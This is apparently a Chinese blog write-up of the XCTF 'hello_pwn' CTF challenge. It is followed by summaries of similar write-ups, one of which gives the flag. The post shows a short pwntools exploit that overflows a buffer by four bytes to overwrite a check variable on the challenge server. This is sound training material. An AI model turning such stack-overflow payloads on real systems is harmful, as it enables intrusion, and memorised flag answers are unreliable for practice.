[攻防世界 pwn]——hello_pwn

最新推荐文章于 2024-11-28 21:08:49 发布

原创最新推荐文章于 2024-11-28 21:08:49 发布 · 437 阅读

0 ·

CC 4.0 BY-SA版权

攻防世界专栏收录该内容

23 篇文章

订阅专栏

本文介绍了参与攻防世界CTF比赛时遇到的一道名为`hello_pwn15`的题目，该题目涉及栈溢出漏洞。通过使用IDA分析，发现可以利用栈溢出修改内存中的特定地址。提供的exploit代码展示了如何构造payload，发送 payload 到远程服务器（111.200.241.244:35304），并成功交互以利用该漏洞。

[攻防世界 pwn]——hello_pwn15

题目地址: https://adworld.xctf.org.cn/
题目:

checksec

IDA，利用栈溢出修改dword_60106C就好距离为4
在这里插入图片描述

在这里插入图片描述

exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",35304)
payload = 'a'*4 + p64(0x6e756161)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
3
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【攻防世界pwn-hello_pwn】

a_silly_coder的博客

01-16

2086

下载文件后，首先检查保护：将文件拖入64位ida，查看代码基本逻辑是：读取一个输入，存入unk_601068，接着比较dword_60106C是否等于一个预期的值，如果相等，执行对应函数，函数内直接执行cat flag.txt 所以思路就是需要覆盖dword_60106C，让其等于预期值，此时我们需要在输入unk_601068时，对dword_60106C进行覆盖，接着我们查看这两个值的存放位置。发现这两个值之间相隔4个字节，所以需要4个字节的填充数据，接着输入预期值。..

攻防世界-PWN-hello_pwn

安全知识学习-该平台为唯一原作者平台，其他平台属冒名顶替，请勿相信上当受骗

09-24

692

开始进军PWN题目录分析拖入IDA exp 分析使用 file 和 checksec（查看程序的保护机制）指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”，说明我们对GOT表具有写权限。这里也没作保护 Stack 栈保护这里没有启用 NX 栈没有执行权限这里是打开的 PI.

3 条评论您还未登录，请先登录后发表或查看评论

3 条评论

m0_51735368 2021.08.22
你好，他那个111.200.241.244是怎么看的

m0_51735368 2021.08.22
你好，他那个111.200.241.244是怎么看的
- 「已注销」回复m0_51735368 2021.08.23
  题目场景

攻防世界 pwn 新手练习区 hello_pwn

ChaoYue_miku的博客

07-06

731

题目来源： NUAACTF 题目描述：pwn！，segment fault！菜鸡陷入了深思 ** 0、下载附件，使用checksec检查保护情况，尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数发现了一个read函数，查看一下unk_601068的栈结构这里是存在栈溢出的，只要覆盖4个字节的内容就可以更改dword_60106C的内容。接着往后查看main函数：有一个if条件判断，只要满足dword_60106C == 18531

hello_pwn

wuyvle的博客

01-23

462

hello_pwn 老惯例放进Linux康康可见是个64位，且没有金丝雀（狂喜）放进ida64康康这有个read函数，进去康康分析main函数要使dword_60106C == 1853186401 才能得到flag 但我们只能给unk_601068赋值，怎么办？这就用上栈溢出了，让我们再看看堆栈两者之间差（ox6c-0x68）这之间数据填满；让unk_601068的值占到dword_60106C的位置开始写脚本比较简单 ...

pwn之hello_pwn

m0_52501802的博客

11-28

421

分析：只有当dword_60106C这个值和1853186401相等时，才会执行sub_400686()，但是又无法直接对dword_60106C进行赋值，继续观察。进入缓冲区观察发现，两者之间刚好差4个字节，所以unk_601068只要直接填充4字节字符，溢出到dword_60106C，再填入1853186401即可。发现前面对进行read操作，读取了0x10个，并放入unk_601068缓存地址，这里第一个参数为0表示从标准输入输出流中读取。未开启堆栈保护，未开启地址空间随机化，可能是堆栈溢出。

攻防世界 Pwn hello_pwn

MrTreebook的博客

10-18

559

攻防世界pwn hello_pwn 文章目录攻防世界pwn hello_pwn1.checksec走一下2.先跑一下看看4.exp如下5.运行结果如下6.可以不用python总结 1.checksec走一下可以看到只有 Partial RELRO 没有开启栈保护，是属于简单的栈溢出pwn题 2.先跑一下看看 ## 3.拉进IDA看一下 sub_400686函数中调用系统函数直接获取flag 因此如果让60106c == 1853186401就可以获取到flag 看到危险函数read可以实现栈

pwn学习（1）攻防世界-hello_pwn（大小端存储/ELF文件）

m0_66039322的博客

08-25

442

最后结果： cyberpeace{f178d34680e278da75e4b40e9921da97}查看读入数据和比较数据的位置，会发现问题，他们是挨着的，且相差4个字节，0000000000601068是开始位置，中间的数据随便填充即可。

攻防世界pwn——cgpwn2

qq_62076255的博客

11-05

499

攻防世界pwn——cgpwn2

攻防世界pwn新手练习（hello_pwn）

BurYiA的博客

10-24

4034

hello_pwn 拿到程序后，我们首先checksec一下可以看到是64位程序，好的是这次只开了NX(堆栈不可执行)，ok，我们跑一下程序看看可以看到它是一个输入，然后就啥都没有了emmmm…好吧，咱们继续放到IDA里面看看 ...

hello pwn

Fiverya的博客

03-08

540

首先打开IDA，拖入程序可以看到一个很简单的程序。 getshell函数如下： getshell 函数地址：在hello函数处下断点：调试到read处，确定溢出点。 payload如下： ...

攻防世界 - pwn - hello_pwn

qq726232111的博客

03-16

1083

A、程序分析 1、缓冲区地址为601068h 2、判断条件 --> 60106Ch为起始地址，存储6E756161h 3、判断条件成立执行cat flag B、利用分析 1、601068h -60106Bh --> 4byte 填充数据 60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161 ...

攻防世界pwn新手练习区-hello_pwn

优快云_sunrise的博客

08-28

828

hello_pwn查看基本信息并运行文件查看基本信息并运行文件

hello_pwn(xctf)

weixin_43868725的博客

05-06

679

0x0 程序保护和流程保护：流程： subsub_400686(): 当dword_60106C = 1853186401 时进入subsub_400686()函数获得flag。 0x1 利用仔细分析后可以发现两个数据是相邻的，我们可以通过read函数改写dword_60106C的值从而获得flag。unk_601068和dword_60106C 只相差四个字节，read函数可以输...

攻防世界 hello_pwn

weixin_73399382的博客

06-30

649

然后从指针&unk_601068指定的缓冲区里面读取最多16位数据（0x10uLL解读：0x代表十六进制，uLL=unsigned long long,无符号long long 型，10转为十进制即为16）直接执行一下，这里看别人的wp是可以通过输入构造字符串来getshell的，我这里就不这么做了，多练写脚本的能力。国际惯例checksec一下，64位小端序，未开启栈溢出保护和地址随机化，很明显这道题利用栈溢出了。刚学pwn的小白，大家互相学习，看看哪里说得不对打在评论区！写脚本，下面两个略微差别。

攻防世界pwn刷题--hello_pwn

m0_74073577的博客

09-29

371

0x60106c-0x611068=4个字节，那么输入4个a就可以到达目标地址（python里b’a‘的长度是一个字节），再输入‘nuaa‘即可，需要注意的是checksec后是小端序，绝大部分题目都是小端序，所以数据高位应该在地址低位，即输入’aaun‘，总体的payload应该是aaaa+aaun，如果暂时无法理解这个亦可以使用pwntools工具，使用p64打包数据即可，这样的话payload应该是payload=b’a‘*4+p64(0x6E756161),这个0x6E。结果是‘nuaa’。

攻防世界-hello_pwn

qq_52333044的博客

06-22

338

第一种：通过先输入四给任意字符再输入"aaun" （为什么是aaun呢，因为小端序和大端序的问题，小端序低地址存低位，大端序就是低地址存高位，这里采用小端序）unk-601068和dword——60106C相差4 个字节，然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用，然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种：就直接写exp。

攻防世界：hello_pwn

2301_80216972的博客

04-09

802

pe分析知道是elf文件（elf文件是Linux下的可执行文件，可以在Linux直接运行）ida分析：下载后ida打开找到main函数，F5反编译。

初学pwn-攻防世界(hello_pwn)

天柱的博客

08-26

3708

初学pwn-writeUp 攻防世界的第二道题目，hello_pwn。首先创建场景，使用nc进入远端，发现他只输出了一串字符串，没有别的内容，也无法使用ls查看它的文件。下载场景提供的文件，使用cat查看，发现是ELF文件，按照大佬的流程，ELF文件直接用ida打开。初次使用ida，深切的感受到了ida的强大。打开之后，按F5，进行反编译，可以看到main函数的伪代码可以从main函数中看到，这里存在一个判断，如果条件达成的话，会调用一个函数。点开函数看一下。可以发现里边会输出flag.tx

攻防世界pwn题目int_overflow